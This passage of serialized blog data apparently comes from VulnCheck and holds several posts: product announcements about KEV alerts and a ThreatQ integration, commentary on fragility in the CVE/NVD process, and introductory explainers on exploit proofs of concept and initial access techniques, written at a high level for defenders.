sightings.",[25,40839,40840,40843],{},[295,40841,40842],{},"Automated Detection Engineering & Response"," Use VulnCheck indicators and IP telemetry to proactively hunt for signs of exploitation and harden defenses against active threats.",[25,40845,40846,40849],{},[295,40847,40848],{},"Threat Intelligence Fusion and Campaign Tracking"," Link known exploits and vulnerable assets to malware toolchains, initial access campaigns, and adversary tradecraft.",[61,40851,40853],{"id":40852},"why-it-matters",[295,40854,40855],{},"Why It Matters:",[18,40857,40858],{},"VulnCheck doesn’t just tell you what could go wrong — it shows you what is going wrong, right now. Combined with ThreatQ, this gives SOC, CTI, vulnerability management, pentesting \u002F red-teaming and AppSec teams a force multiplier for operationalizing exploit intelligence across detection, response, and remediation.",[61,40860,40862],{"id":40861},"get-started-today",[295,40863,40864],{},"Get Started Today:",[18,40866,40867,40871],{},[47,40868,40870],{"href":40721,"rel":40869},[51],"VulnCheck is available today in the ThreatQ Marketplace",". 
Integration takes just minutes — connect your VulnCheck API credentials and start ingesting high-value exploit intelligence directly into your ThreatQ instance.",[18,40873,40874,40875,59],{},"For setup instructions, visit: ",[47,40876,40877],{"href":40877,"rel":40878},"https:\u002F\u002Fdocs.vulncheck.com",[51],{"title":219,"searchDepth":220,"depth":220,"links":40880},[40881,40882,40883,40884,40885,40886],{"id":40710,"depth":220,"text":40713},{"id":40727,"depth":220,"text":40730},{"id":40759,"depth":220,"text":40762},{"id":40817,"depth":220,"text":40820},{"id":40852,"depth":220,"text":40855},{"id":40861,"depth":220,"text":40864},"2025-07-02","This integration brings VulnCheck’s exploit-centric vulnerability intelligence directly into ThreatQ, enabling joint customers to supercharge threat operations, vulnerability prioritization, and incident response with real-world exploit data.",{"slug":40890},"vulncheck-threatquotient-partnership","\u002Fblog\u002Fvulncheck-threatquotient-partnership",{"description":40888,"title":40695},"blog\u002Fvulncheck-threatquotient-partnership",[],"mbGfTxrO-FP7X8uEL0gRwYs20z5ogM2EhHavM8sHxx4",{"id":40897,"title":40898,"articles":40899,"authors":40908,"body":40910,"date":40903,"description":41052,"extension":234,"image":7,"link":7,"meta":41053,"navigation":237,"path":41054,"seo":41055,"series":7,"stem":41056,"subtype":7,"tags":41057,"__hash__":41058},"blog\u002Fblog\u002Fvulncheck-kev-alerts.md","Timely Threat Intelligence for Defenders with VulnCheck KEV Alerts",[40900,40904],{"title":40901,"source":251,"link":40902,"date":40903},"VulnCheck Expands Real-Time KEV Alerts with Broader Integrations, Faster Intelligence, and Scalable API Access","https:\u002F\u002Fwww.msspalert.com\u002Fnews\u002Fvulncheck-expands-real-time-kev-alerts-with-broader-integrations-faster-intelligence-and-scalable-api-access","2025-06-25",{"title":40905,"source":40906,"link":40907,"date":40903},"VulnCheck KEV Alerts Deliver Instant Warnings on Actively Exploited 
Vulnerabilities with Real-Time Slack and Email Notifications","VMBlog","https:\u002F\u002Fvmblog.com\u002Farchive\u002F2025\u002F06\u002F25\u002Fvulncheck-kev-alerts-deliver-instant-warnings-on-actively-exploited-vulnerabilities-with-real-time-slack-and-email-notifications.aspx",[40909],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":40911,"toc":41039},[40912,40918,40920,40931,40935,40938,40941,40947,40951,40954,40959,40963,40966,40971,40975,40978,40982,40985,40988,40992,40998,41001,41005,41011,41014,41018,41024,41027,41029,41031],[18,40913,40914],{},[68,40915],{"alt":40916,"src":40917},"VulnCheck KEV Alerts","\u002Fblog\u002Fvulncheck-kev-alerts\u002Fvulncheck-kev-alerts.png",[61,40919,20],{"id":3520},[22,40921,40922,40925,40928],{},[25,40923,40924],{},"VulnCheck KEV has expanded to provide Email and Slack alerting.",[25,40926,40927],{},"In 2025, VulnCheck KEV has 142% more KEVs than CISA.",[25,40929,40930],{},"Based on VulnCheck intelligence, 70.3% of CISA KEVs have publicly available exploitation evidence days, months or years before being added to the CISA KEV catalog.",[61,40932,40934],{"id":40933},"email-slack-alerting-now-available-for-vulncheck-kev","Email \u002F Slack Alerting Now Available for VulnCheck KEV",[18,40936,40937],{},"We’re excited to announce the expansion of VulnCheck Community to include VulnCheck KEV Alerts: you can now receive alerts via Email and Slack. 
This further enhances the accessibility of VulnCheck KEV, which is now available through the VulnCheck API, Go SDK, Python SDK, CLI, web interface, and, most recently, via email and Slack.",[18,40939,40940],{},"This new capability enables defenders to receive real-time notifications whenever a new vulnerability is added to VulnCheck KEV, helping you stay ahead of exploitation activity and respond more quickly to emerging threats.",[18,40942,40943,40944],{},"VulnCheck Alerts Configuration Documentation: ",[47,40945,19592],{"href":19592,"rel":40946},[51],[993,40948,40950],{"id":40949},"email-alerts","Email Alerts",[18,40952,40953],{},"Subscribe to receive an email notification every time VulnCheck adds a new Known Exploited Vulnerability. Get exploitation intelligence delivered straight to your inbox.",[18,40955,40956],{},[68,40957],{"alt":40950,"src":40958},"\u002Fblog\u002Fvulncheck-kev-alerts\u002Femail-alerts.png",[993,40960,40962],{"id":40961},"slack-alerts","Slack Alerts",[18,40964,40965],{},"Configure Slack integration to receive real-time alerts in the channel of your choice whenever a new KEV is published. Keep your team in the loop and act fast without leaving your workspace.",[18,40967,40968],{},[68,40969],{"alt":40962,"src":40970,"width":28205},"\u002Fblog\u002Fvulncheck-kev-alerts\u002Fslack-alerts.png",[61,40972,40974],{"id":40973},"a-year-of-growth-and-impact-with-vulncheck-kev","A Year of Growth and Impact with VulnCheck KEV",[18,40976,40977],{},"Today, VulnCheck KEV includes over 3,700 known exploited vulnerabilities. It’s trusted by thousands of defenders worldwide and integrated into a growing number of security products. 
This milestone reflects our commitment to arming the security community with the data necessary to act quickly and effectively against the most significant threats.",[61,40979,40981],{"id":40980},"what-makes-vulncheck-kev-unique","What Makes VulnCheck KEV Unique",[18,40983,40984],{},"VulnCheck provides timely, high-quality intelligence on exploited vulnerabilities, including:\nPublicly referenceable exploitation evidence\nRansomware attribution Exploits from VulnCheck XDB (eXploit DataBase) - so defenders know what\u002Fhow to block an attack.",[18,40986,40987],{},"We continue to support and complement CISA’s efforts. Still, our focus remains on delivering broader, faster, and more actionable exploitation intelligence to all defenders, without restrictions, while extending alerting and tooling that provides easy access to both VulnCheck community and commercial offerings..",[61,40989,40991],{"id":40990},"known-exploited-vulnerabilities-added-to-vulncheck-kev-vs-cisa-kev-jan-24-2025-to-jun-20-2025","Known Exploited Vulnerabilities Added to VulnCheck KEV vs. CISA KEV (Jan. 24, 2025 to Jun. 20, 2025)",[18,40993,40994],{},[68,40995],{"alt":40996,"src":40997},"Comparison","\u002Fblog\u002Fvulncheck-kev-alerts\u002Fvulncheck-cisa-comparison-2025.png",[18,40999,41000],{},"VulnCheck fully incorporates the CISA Known Exploited Vulnerabilities (KEV) catalog, but our intelligence goes further; we continuously aggregate exploitation evidence from hundreds of independent sources every day. For defenders, understanding the volume of new KEVs each month is crucial for capacity planning, prioritization and timely mitigation.\nOn average, security teams can expect VulnCheck KEV to identify between 40 and 100 CVEs per month that have confirmed evidence of exploitation. 
While most months fall within this range, there are occasional outliers.",[61,41002,41004],{"id":41003},"_2025-timeline-comparison-of-vulncheck-kev-vs-cisa-kev-jan-24-2025-to-jun-20-2025","2025 Timeline Comparison of VulnCheck KEV vs. CISA KEV (Jan. 24, 2025 to Jun. 20, 2025)",[18,41006,41007],{},[68,41008],{"alt":41009,"src":41010},"Daily Kev Comparison","\u002Fblog\u002Fvulncheck-kev-alerts\u002Fdaily-kev-comparison.png",[18,41012,41013],{},"We have prioritized the automation of trusted sources such as CISA KEV, Shadow Server, and Microsoft MSRC, while our analyst team actively triages and validates exploitation evidence from additional channels. From January 24 through June 20 of this year, VulnCheck identified 311 CVEs with evidence of exploitation, resulting in 142% more KEVs than CISA in 2025.",[61,41015,41017],{"id":41016},"_2025-speed-comparison-of-vulncheck-kev-vs-cisa-kev","2025 Speed Comparison of VulnCheck KEV vs. CISA KEV",[18,41019,41020],{},[68,41021],{"alt":41022,"src":41023},"VulnCheck KEV Timeline","\u002Fblog\u002Fvulncheck-kev-alerts\u002Fvulncheck-kev-timeline.png",[18,41025,41026],{},"A key focus of VulnCheck KEV is speed, ensuring defenders receive early visibility when a vulnerability is being actively exploited in the wild. In 2025, VulnCheck added 311 exploited vulnerabilities to its KEV. Of those, only 128 have also been included in the CISA KEV so far. 
For 90 of the 128 vulnerabilities, representing 70.3%, evidence of exploitation existed days, months, or even years before their inclusion in the CISA KEV.",[61,41028,202],{"id":201},[18,41030,40664],{},[18,41032,40667,41033,8659,41036,40676],{},[47,41034,40672],{"href":40670,"rel":41035},[51],[47,41037,1233],{"href":2871,"rel":41038},[51],{"title":219,"searchDepth":220,"depth":220,"links":41040},[41041,41042,41046,41047,41048,41049,41050,41051],{"id":3520,"depth":220,"text":20},{"id":40933,"depth":220,"text":40934,"children":41043},[41044,41045],{"id":40949,"depth":1266,"text":40950},{"id":40961,"depth":1266,"text":40962},{"id":40973,"depth":220,"text":40974},{"id":40980,"depth":220,"text":40981},{"id":40990,"depth":220,"text":40991},{"id":41003,"depth":220,"text":41004},{"id":41016,"depth":220,"text":41017},{"id":201,"depth":220,"text":202},"We're excited to announce the expansion of VulnCheck Community to include VulnCheck KEV Alerts via Email and Slack",{},"\u002Fblog\u002Fvulncheck-kev-alerts",{"title":40898,"description":41052},"blog\u002Fvulncheck-kev-alerts",[1280,242,1279],"NhpPx_oUi8to9AiRcLqDZ_hPTHDzL4sWd2aXzhmlfjY",{"id":41060,"title":41061,"articles":7,"authors":41062,"body":41064,"date":41210,"description":41211,"extension":234,"image":7,"link":7,"meta":41212,"navigation":237,"path":41214,"seo":41215,"series":7,"stem":41216,"subtype":7,"tags":7,"__hash__":41217},"blog\u002Fblog\u002Fcve-fragility.md","CVE Fragility Is Real, But Totally Fixable.",[41063],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":41065,"toc":41204},[41066,41072,41086,41089,41092,41095,41098,41102,41105,41108,41128,41132,41135,41138,41141,41144,41155,41158,41161,41164,41178,41182,41185,41188,41191,41194,41197,41200,41202],[18,41067,41068],{},[68,41069],{"alt":41070,"src":41071},"CVE Fragility","\u002Fblog\u002Fcve-fragility\u002Fcve-fragility.png",[18,41073,41074,41075,1246,41080,41085],{},"Forrester’s recent blog by 
",[47,41076,41079],{"href":41077,"rel":41078},"https:\u002F\u002Fwww.forrester.com\u002Fblogs\u002Fauthor\u002Ferik_nost\u002F",[51],"Eric Nost",[47,41081,41084],{"href":41082,"rel":41083},"https:\u002F\u002Fwww.forrester.com\u002Fblogs\u002Fmitregeddon-averted-but-fragility-in-cve-processes-remain\u002F?ref_search=4510357_1747847539419",[51],"Mitregeddon Averted, But Fragility in CVE Processes Remain",", shines a much-needed spotlight on the systemic challenges facing the CVE and NVD ecosystem from the industry analyst perspective.",[18,41087,41088],{},"At VulnCheck, we understand how the increasing demand for timely, reliable, and actionable vulnerability intelligence is straining legacy processes, and we agree: the underlying fragility isn’t just a governance issue, it’s an operational challenge.",[18,41090,41091],{},"Eric’s post rightly points to the growing complexity in coordinating disclosures across a global ecosystem of vendors, researchers, coordinators, and consumers. It also calls out how uncertainty in CVE issuance and NVD publication timelines create risk, not just reputational, but operational and security-related for anyone building products or defending their organization.",[18,41093,41094],{},"This echoes exactly what we hear from our customers and partners, when CVE data is late, incomplete, or missing context, it slows down triage and hampers effective vulnerability management - it disrupts the ability to respond to threats.",[18,41096,41097],{},"What is real is this - security product teams and enterprise defenders are under increasing pressure to act fast, prioritize effectively, and reduce risk. 
When foundational systems like the CVE program and NVD show signs of strain, the ripple effects are immediate.",[61,41099,41101],{"id":41100},"vulnchecks-take","VulnCheck’s Take",[18,41103,41104],{},"We believe there is a path forward, one that doesn’t rely on patching over governance gaps, but instead complements existing infrastructure with faster, richer, and more contextualized intelligence.",[18,41106,41107],{},"That’s why VulnCheck continues to innovate and invest in:",[1789,41109,41110,41116,41122],{},[25,41111,41112,41115],{},[295,41113,41114],{},"Rapid Vulnerability Ingestion and Enrichment"," - we detect and process CVEs in near real-time, frequently identifying vulnerabilities before they’re fully cataloged in NVD.",[25,41117,41118,41121],{},[295,41119,41120],{},"Exploitation Context"," - VulnCheck doesn’t stop at the CVE. We layer in exploit intelligence, PoC validation, and in-the-wild observations to help teams prioritize threats based on what’s actually being weaponized.",[25,41123,41124,41127],{},[295,41125,41126],{},"Redundancy Where It Matters"," - when NVD availability faltered, VulnCheck stepped up by maintaining access to NVD 1.0 through our Community tier - and then subsequently our VulnCheck NVD++ featuring significant enrichments and API dependability This ensured continuity for the many organizations whose workflows depend on timely CVE data.",[61,41129,41131],{"id":41130},"this-is-relevant-to-product-builders-and-enterprise-response","This is Relevant to Product-builders and Enterprise Response",[18,41133,41134],{},"As Forrester notes, “the vulnerability disclosure process is, and always has been, fragile.” That fragility shows up in different ways depending on your role:",[18,41136,41137],{},"For Product Leads at cybersecurity companies - - you're building threat detection, asset management, or prioritization tools that rely on CVE and NVD as a baseline.",[18,41139,41140],{},"But when that data is delayed, incomplete, or stripped of 
context, your product suffers — and so does customer trust. Integrating richer exploit intelligence, better timelines, and verified evidence of exploitation gives your platform an edge in accuracy and timeliness.",[18,41142,41143],{},"What do product teams get from VulnCheck?",[22,41145,41146,41149,41152],{},[25,41147,41148],{},"Near real-time CVE ingestion and exploit PoC curation",[25,41150,41151],{},"Exploitation timelines to support risk decisions",[25,41153,41154],{},"Full-scale internet monitoring across 500+ sources for complete global vulnerability and exploit intelligence on ALL CVEs to enhance your product and enable new features",[18,41156,41157],{},"What do CISOs and enterprise defenders need? First, the reliance on vulnerability intelligence to drive prioritization informs teams on what to patch, what to monitor, what to escalate.",[18,41159,41160],{},"However, when the CVE process breaks down, the NVD is backlogged, or CISA is over a month late in adding exploited vulnerabilities to its KEV, teams are left with blind spots. 
Worse, attackers don’t wait for the paperwork to be filed or for data to be curated - they exploit delays.",[18,41162,41163],{},"Where VulnCheck helps:",[22,41165,41166,41169,41172,41175],{},[25,41167,41168],{},"Early detection of vulnerabilities before they are analyzed by NIST NVD",[25,41170,41171],{},"Evidence-based exploit intelligence (not just theoretical) before they hit the CISA KEV",[25,41173,41174],{},"Risk-focused enrichment to help you cut through CVE noise and prioritize what matters",[25,41176,41177],{},"Full-scale internet monitoring across 500+ sources for complete global vulnerability and exploit intelligence on ALL CVEs for complete and timely visibility to enable response actioning",[61,41179,41181],{"id":41180},"building-resilience-while-speeding-up-threat-response","Building Resilience While Speeding Up Threat Response",[18,41183,41184],{},"VulnCheck supports the important role of NIST NVD, the CVE program, and the CISA KEV for that matter. However, security teams are demanding more actionable data at faster speeds to make the right decisions, which is why they are turning to VulnCheck.",[18,41186,41187],{},"To that point, the objective we’re after is to reinforce these data feeds with more intelligence to help build a more robust, distributed ecosystem that balances central coordination with independent validation, augmentation and associations to emerging threat indicators.",[18,41189,41190],{},"Forrester’s blog gets this right: “we need to evolve.” We agree with Forrester: fixing the CVE\u002FNVD pipeline isn’t just about governance — it’s about resilience. 
And resilience comes from distribution, context, and operational redundancy.",[18,41192,41193],{},"At VulnCheck, we’re already helping the market evolve to move faster, prioritize vulnerabilities better, and maintain resiliency in the face of an increasingly chaotic vulnerability landscape. That’s why VulnCheck continues to act as both a complement and a failsafe for customers, partners and the entire cybersecurity ecosystem.",[18,41195,41196],{},"There’s a reason that over 100 cybersecurity products and thousands of consumers have either integrated VulnCheck intelligence, or ship with VulnCheck intelligence today. And our intelligence integrates directly into some of the most sophisticated threat response workflows that help protect our critical infrastructure, national security and our global economy.",[18,41198,41199],{},"If you’re building security products or protecting a large enterprise, now’s the time to rethink your dependency on legacy processes — and lean into a model that prioritizes operational speed and exploit-informed accuracy.",[61,41201,202],{"id":201},[18,41203,40664],{},{"title":219,"searchDepth":220,"depth":220,"links":41205},[41206,41207,41208,41209],{"id":41100,"depth":220,"text":41101},{"id":41130,"depth":220,"text":41131},{"id":41180,"depth":220,"text":41181},{"id":201,"depth":220,"text":202},"2025-05-23","Forrester’s recent blog by Eric Nost, Mitregeddon Averted, But Fragility in CVE Processes Remain, shines a much-needed spotlight on the systemic challenges facing the CVE and NVD ecosystem from the industry analyst 
perspective.",{"slug":41213},"cve-fragility","\u002Fblog\u002Fcve-fragility",{"title":41061,"description":41211},"blog\u002Fcve-fragility","z4FtLWvrutltaUKzrvmKE649-skiejrmd0KOcs_CXOM",{"id":41219,"title":41220,"articles":7,"authors":41221,"body":41223,"date":41210,"description":41483,"extension":234,"image":7,"link":7,"meta":41484,"navigation":237,"path":41486,"seo":41487,"series":41488,"stem":41492,"subtype":7,"tags":41493,"__hash__":41495},"blog\u002Fblog\u002Funderstanding-exploit-proof-of-concept.md","Understanding Exploit Proof-of-Concept",[41222],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":41224,"toc":41471},[41225,41228,41251,41254,41257,41277,41280,41284,41287,41291,41294,41314,41318,41321,41325,41328,41331,41345,41349,41352,41363,41366,41369,41373,41376,41379,41395,41399,41402,41434,41438,41441,41461,41465,41468],[18,41226,41227],{},"This knowledge base article will give insight into:",[22,41229,41230,41233,41236,41239,41242,41245,41248],{},[25,41231,41232],{},"Definition of a Proof-of-Concept Exploit",[25,41234,41235],{},"How PoC exploits work",[25,41237,41238],{},"How the Common Vulnerability Scoring System (CVSS) uses PoC exploits",[25,41240,41241],{},"Differences between PoC and PoC exploit",[25,41243,41244],{},"Different types of PoC exploits",[25,41246,41247],{},"Exploit PoC use cases",[25,41249,41250],{},"Common exploit PoC databases",[18,41252,41253],{},"A Proof-of-Concept (PoC) exploit is published by a security researcher, and  provides technical details that illustrate how cyber threat actors can leverage a vulnerability to achieve their malicious objectives. 
These benign attacks demonstrate the potential impact that a specific vulnerability can have on the organization’s security posture, helping vulnerability and patch management teams prioritize their remediation activities.",[18,41255,41256],{},"The key features of a PoC exploit include:",[22,41258,41259,41265,41271],{},[25,41260,41261,41264],{},[295,41262,41263],{},"Purpose",": Demonstrating a security flaw’s impact without causing harm.",[25,41266,41267,41270],{},[295,41268,41269],{},"Implementation",": Releasing the demonstration publicly.",[25,41272,41273,41276],{},[295,41274,41275],{},"Use",": Modifying risk based on how threat actors craft fully functional exploits.",[18,41278,41279],{},"Malicious actors can create fake PoC exploits to trick security teams into downloading them, attempting to execute arbitrary malicious code.",[61,41281,41283],{"id":41282},"how-do-poc-exploits-work","How Do PoC Exploits Work?",[18,41285,41286],{},"Exploit PoCs highlight the feasibility of attackers using a vulnerability to gain unauthorized access to or allow unintended actions within systems. Although intended to help prioritize applying security updates or implementing remediation measures, the public release of an exploit PoC can lead attackers to building real exploits that they use in future attacks.",[993,41288,41290],{"id":41289},"stage-1-vulnerability-identification","Stage 1: Vulnerability Identification",[18,41292,41293],{},"The vulnerability identification phase uncovers a weakness in software or systems that malicious actors could potentially use during an attack. 
Security researchers often use security scanners or manual techniques to identify issues, for example:",[22,41295,41296,41302,41308],{},[25,41297,41298,41301],{},[295,41299,41300],{},"Coding errors",": including vulnerable code, outdated components, or vulnerable third-party libraries.",[25,41303,41304,41307],{},[295,41305,41306],{},"Misconfigurations",": including use of default accounts and passwords, access to unnecessary features and functionality, or error handling that reveals sensitive information.",[25,41309,41310,41313],{},[295,41311,41312],{},"Design flaws",": weakness caused by insecure system architecture or logic decisions made during development.",[993,41315,41317],{"id":41316},"stage-2-vulnerability-analysis","Stage 2: Vulnerability Analysis",[18,41319,41320],{},"During this phase, researchers work to understand the vulnerability’s mechanics by looking at how it operates. Researchers analyze a vulnerability's exploitability by first understanding the underlying code and behavior that causes the issue. They examine how the input interacts with the system, identify any inherent constraints in the system, and determine the impact of manipulating that input. Static and dynamic analysis tools help them trace data flow, monitor memory access, and assess whether the flaw can lead to unauthorized actions like code execution, privilege escalation, or data leakage. In short, researchers act like attackers, using automated tools and manual processes to determine how they can use a vulnerability to compromise the application or operating system.",[993,41322,41324],{"id":41323},"stage-3-development-of-exploit-code","Stage 3: Development of Exploit Code",[18,41326,41327],{},"Once they understand the vulnerability’s mechanics, researchers can move on to build a program or script that targets the vulnerability. 
They exploit the vulnerability in an environment that will not cause harm to real systems, demonstrating how unauthenticated attackers could gain unauthorized access or manipulate data.",[18,41329,41330],{},"Some examples of exploit types include:",[22,41332,41333,41336,41339,41342],{},[25,41334,41335],{},"Remote code execution",[25,41337,41338],{},"Malware delivery",[25,41340,41341],{},"Relay attacks",[25,41343,41344],{},"Authentication bypass",[61,41346,41348],{"id":41347},"how-does-the-common-vulnerability-scoring-system-cvss-use-exploit-poc","How Does The Common Vulnerability Scoring System (CVSS) Use Exploit PoC?",[18,41350,41351],{},"The CVSS includes Exploit PoC under the Threat Metrics category, helping to adjust a vulnerability’s severity. The availability of proof-of-concept is one stage in measuring Exploit Maturity. Vulnerabilities are identified within CVSS  as Proof-of-Concept (P) when there is credible threat intelligence showing all of the following:",[22,41353,41354,41357,41360],{},[25,41355,41356],{},"Proof-of-concept exploit code is publicly available.",[25,41358,41359],{},"No knowledge of reported attempts to exploit the vulnerability exists.",[25,41361,41362],{},"No knowledge of publicly available solutions used to simplify attempts to exploit the vulnerability exists.",[18,41364,41365],{},"The existence of an exploit PoC increases the security risk for a vulnerability because it means that attackers could use publicly available information to deploy a successful attack.",[18,41367,41368],{},"Simultaneously, since no threat intelligence indicates that attackers have used the exploit in the real world, the risk remains lower than an Attacked vulnerability which has reports of attempted or successful attacks and public exploits or privately available solutions to make exploiting the vulnerability easier.",[61,41370,41372],{"id":41371},"what-is-the-difference-between-proof-of-concept-poc-and-poc-exploit","What Is The Difference Between 
Proof-of-Concept (PoC) And PoC Exploit?",[18,41374,41375],{},"At a high level, PoC applies generally to any research indicating that something is possible. For example, it can be used to show that a theory could work or during the procurement process to see if a tool would work for the organization’s intended use case. Meanwhile, an exploit PoC is specific to technology security vulnerabilities to show that attackers could use the weakness to compromise systems, networks, or applications.",[18,41377,41378],{},"The three primary differences between a PoC and exploit PoC are:",[22,41380,41381,41384,41389],{},[25,41382,41383],{},"Nature: While a PoC demonstrates how a theory could work, a PoC exploit is the practical application with exploit code for using a vulnerability during an attack.",[25,41385,41386,41388],{},[295,41387,41263],{},": While a PoC shows that a vulnerability could cause risk, an exploit PoC demonstrates the method or tactic that malicious actors can use during an attack.",[25,41390,41391,41394],{},[295,41392,41393],{},"Functionality",": While a PoC lacks operational details, an exploit PoC includes modifiable code that could be used.",[61,41396,41398],{"id":41397},"what-are-some-exploit-poc-use-cases","What Are Some Exploit PoC Use Cases?",[18,41400,41401],{},"Security and vulnerability management teams can use exploit PoCs in several ways, including:",[22,41403,41404,41410,41416,41422,41428],{},[25,41405,41406,41409],{},[295,41407,41408],{},"Vulnerability assessment",": Security professionals employ the existence of PoC exploits to identify critical vulnerabilities and potential threats in a controlled setting, allowing developers to grasp the severity and mechanics of vulnerabilities.",[25,41411,41412,41415],{},[295,41413,41414],{},"Educating developers",": By demonstrating how attackers can exploit a particular vulnerability, PoCs provide a hands-on approach for engineers and researchers to learn about potential security 
weaknesses.",[25,41417,41418,41421],{},[295,41419,41420],{},"Security patch development",": PoC exploits help create effective mitigation strategies and security updates to defend against threat actors and arbitrary code execution.",[25,41423,41424,41427],{},[295,41425,41426],{},"Risk demonstration",": PoC exploits illustrate the feasibility of cyberattacks, facilitating a deeper understanding of what security flaws may lead to real-world exploits.",[25,41429,41430,41433],{},[295,41431,41432],{},"Research and innovation",": Security teams and researchers use PoCs to conduct experiments, prompting innovation in defensive technologies and security advisories.",[61,41435,41437],{"id":41436},"what-is-a-poc-exploit-database","What Is A PoC Exploit Database?",[18,41439,41440],{},"Exploit PoC databases offer security researchers and professionals resources to understand and mitigate vulnerabilities. Some common features across all exploit PoC databases include:",[22,41442,41443,41449,41455],{},[25,41444,41445,41448],{},[295,41446,41447],{},"Comprehensive collections",": Includes various categories, such as web apps, shells, and zero-days.",[25,41450,41451,41454],{},[295,41452,41453],{},"Verification system",": Tested exploits are marked to ensure reliability.",[25,41456,41457,41460],{},[295,41458,41459],{},"Community engagement",": Involvement from security professionals and researchers.",[61,41462,41464],{"id":41463},"vulncheck-exploit-intelligence-breadth-and-depth-of-exploit-poc-to-help-prioritize-remediation","VulnCheck Exploit Intelligence: Breadth and Depth of Exploit PoC to Help Prioritize Remediation",[18,41466,41467],{},"With VulnCheck Exploit & Vulnerability intelligence, security and vulnerability remediation teams gain access to a breadth of data that incorporates the NIST National Vulnerability Database (NVD) and CISA Known Exploited Vulnerability (KEV) catalog coupled with exploit intelligence that provides insight into real-world attacker 
activity.",[18,41469,41470],{},"With our Exploit Intelligence, organizations can rapidly improve their vulnerability prioritization and remediation capabilities with data about public and commercial exploits, including reported exploited, weaponized exploits, threat actors attributed with the vulnerability, ransomware campaigns using the vulnerability, and botnets attributed to the vulnerability.",{"title":219,"searchDepth":220,"depth":220,"links":41472},[41473,41478,41479,41480,41481,41482],{"id":41282,"depth":220,"text":41283,"children":41474},[41475,41476,41477],{"id":41289,"depth":1266,"text":41290},{"id":41316,"depth":1266,"text":41317},{"id":41323,"depth":1266,"text":41324},{"id":41347,"depth":220,"text":41348},{"id":41371,"depth":220,"text":41372},{"id":41397,"depth":220,"text":41398},{"id":41436,"depth":220,"text":41437},{"id":41463,"depth":220,"text":41464},"Exploit Intel 101 - Understanding Exploit Proof-of-Concept",{"slug":41485},"understanding-exploit-proof-of-concept","\u002Fblog\u002Funderstanding-exploit-proof-of-concept",{"title":41220,"description":41483},{"title":41489,"color":41490,"icon":41491},"Exploit Intelligence 101","primary","i-mdi-book-search","blog\u002Funderstanding-exploit-proof-of-concept",[41494],"101","L2wMEvWh9w7FCjBKp5aSceTwCLaV5XXe9t1IXA6nP48",{"id":41497,"title":41498,"articles":7,"authors":41499,"body":41501,"date":41210,"description":41799,"extension":234,"image":7,"link":7,"meta":41800,"navigation":237,"path":41802,"seo":41803,"series":41804,"stem":41805,"subtype":7,"tags":41806,"__hash__":41807},"blog\u002Fblog\u002Funderstanding-initial-access-exploits.md","Understanding Initial Access 
Exploits",[41500],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":41502,"toc":41782},[41503,41506,41526,41529,41532,41536,41545,41607,41611,41620,41624,41632,41636,41645,41649,41657,41661,41669,41673,41680,41684,41687,41695,41699,41708,41712,41720,41724,41733,41737,41740,41772,41776,41779],[18,41504,41505],{},"This knowledge base article will provide insight into:",[22,41507,41508,41511,41514,41517,41520,41523],{},[25,41509,41510],{},"Definition of an initial access exploit",[25,41512,41513],{},"Different types of techniques for gaining initial access",[25,41515,41516],{},"Examples of initial access exploits",[25,41518,41519],{},"Examples of a zero-day exploit attack",[25,41521,41522],{},"How attackers choose targets",[25,41524,41525],{},"Initial access exploit mitigations",[18,41527,41528],{},"Initial access in cybersecurity refers to the stage where an attacker first gains unauthorized access to a target network or system. Using this entry point, they can launch additional malicious activities, like lateral movement or data theft.",[18,41530,41531],{},"Attackers often gain initial access by exploiting operating system, software, and firmware vulnerabilities. The need for vendors and security researchers to publicly disclose and document vulnerabilities often makes it simple for threat actors to research and exploit the weaknesses.",[61,41533,41535],{"id":41534},"what-are-the-different-types-of-techniques-attackers-use-to-gain-initial-access","What are the Different Types of Techniques Attackers Use to Gain Initial Access?",[18,41537,41538,41539,41544],{},"Techniques, as represented in the ",[47,41540,41543],{"href":41541,"rel":41542},"https:\u002F\u002Fattack.mitre.org\u002Ftactics\u002FTA0001\u002F",[51],"MITRE ATT&CK Framework"," offer insight into the different ways that attackers can achieve their objectives. 
The eleven techniques listed in the Framework are:",[22,41546,41547,41553,41559,41565,41571,41577,41583,41589,41595,41601],{},[25,41548,41549,41552],{},[295,41550,41551],{},"Content Injection",": Using compromised data transfer channels to insert malicious content into systems.",[25,41554,41555,41558],{},[295,41556,41557],{},"Drive-by Compromise",": Delivering exploit code to a browser so they can gain access when a user visits a website during normal browsing.",[25,41560,41561,41564],{},[295,41562,41563],{},"Exploit Public-Facing Application",": Taking advantage of a vulnerable external-facing remote service, like virtual private network (VPN) or web application, to connect to the internal enterprise resources.",[25,41566,41567,41570],{},[295,41568,41569],{},"Hardware Additions",": Introducing computer accessories, networking hardware, or other computer devices, like a thumb drive, that act as an initial attack vector.",[25,41572,41573,41576],{},[295,41574,41575],{},"Phishing",": Sending fake emails that appear legitimate to trick users into sharing credentials or downloading malicious code with sub techniques that include Spearphishing Attachment, Spearphishing Link, Spearphishing via Service, and Spearphishing Voice.",[25,41578,41579,41582],{},[295,41580,41581],{},"Replication Through Removable Media",": Taking advantage of Autorun features to deploy malware when someone inserts the media into a system and executes, often enabling the threat actors to gain unauthorized access to disconnected or air-gapped networks.",[25,41584,41585,41588],{},[295,41586,41587],{},"Supply Chain Compromise:"," Manipulating products or product delivery mechanisms to compromise data or systems with subtechniques that include Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain, and Compromise Hardware Supply Chain.",[25,41590,41591,41594],{},[295,41592,41593],{},"Trusted Relationship",": Using a trusted third-party relationship with an established 
connection that may lack protection or receive less scrutiny.",[25,41596,41597,41600],{},[295,41598,41599],{},"Valid Accounts",": Obtaining and using leaked or stolen credentials for legitimate users to bypass access controls that organizations implement for remote access, like VPNs, Outlook Web Access, network devices, or remote desktop applications with subtechniques that include Default Accounts, Domain Accounts, Local Accounts, and Cloud Accounts.",[25,41602,41603,41606],{},[295,41604,41605],{},"Wi-Fi Networks",": Connecting to a target organization’s wireless networks by exploiting open Wi-Fi networks using devices or valid account credentials.",[61,41608,41610],{"id":41609},"what-are-some-examples-of-initial-access-exploits","What are Some Examples of Initial Access Exploits?",[18,41612,41613,41614,41619],{},"A wide variety of vulnerabilities can be exploited for initial access by attackers. In some cases security researchers are able to provide ",[47,41615,41618],{"href":41616,"rel":41617},"https:\u002F\u002Fdocs.vulncheck.com\u002Fkb#exploit-proof-of-concept-poc",[51],"Proof of Concept (PoC) exploits"," to help security and vulnerability 